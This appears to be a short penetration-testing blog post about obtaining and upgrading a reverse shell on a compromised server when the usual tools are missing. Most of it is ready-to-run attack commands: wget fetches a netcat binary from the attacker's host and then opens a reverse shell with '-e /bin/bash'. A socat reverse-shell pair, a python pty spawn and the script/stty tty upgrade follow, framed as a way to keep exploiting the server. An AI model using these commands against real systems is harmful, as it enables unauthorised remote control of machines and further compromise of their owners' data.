During a recent application exploit into an interactive shell the typical path to spawn a reverse shell and upgrade it to tty was sought.
It was found that the go to technologies such as python, php, socat, ruby were unavailable so the following steps were taken in order to spawn the reverse shell and upgrade to tty as shown in the following exploit image:
First of all if you do not wish to go through the hassle of having tty with bash completion etc then merely fire the following command into the pseudo terminal:
/usr/bin/script -qc /bin/bash /dev/null #followed by: stty raw -echo; fg; reset
This will break you out of the pseudo terminal and into a tty shell, you can then su and carry out all other terminal based commands; for those wanting to jump through a couple of hoops and obtain a tty shell due to the above not working 100% then one of many ways to do this is below.
Copy over NC and spawn a shell
Using wget and python’s SimpleHttpServer NC was easily moved over to the target:
Server: cd /tmp; wget http://10.x.x.x:9998/nc; chmod +x nc Server: ./nc 10.x.x.x 9998 -e /bin/bash --------------------------------------------------------------------- Attacking Machine: cp /usr/bin/nc .; python -m SimpleHttpServer 9998 Attacking Machine: nc -nlvp 9998
Break out of pseudo shell and upgrade to a tty shell
In order to upgrade our shell we first need to break out of the pseudo shell we are in.
First we will need to upgrade to a pty shell, generally I would default to trusty python using the following:
python -c 'import pty; pty.spawn("/bin/bash")' # OR Using SOCAT Attacking Server: socat file:`tty`,raw,echo=0 tcp-listen:9998 Victim Machine: socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.x.x.x:9998
As neither of our prefered technologies were available we can fall back onto a more simple but what seems to be a long forgotten way of upgrading, which is using script.
Our our attacking machine which has caught the reverse nc shell we can simply breakout of our pseudo shell using the following command:
Attacking Machine: /usr/bin/script -qc /bin/bash /dev/null
All that is left is to do the following:
A: CTRL + Z to background the shell
B: paste or type the following into the terminal on the attacking machine.
stty raw -echo; fg; reset
Now you have a fully interactive shell with autocomplete and can continue to exploit the server and potentially execute su or local ssh commands on the server.
Granted there are many many more ways to achieve a the same shell, but using script seems to be overlooked quite often hence the post.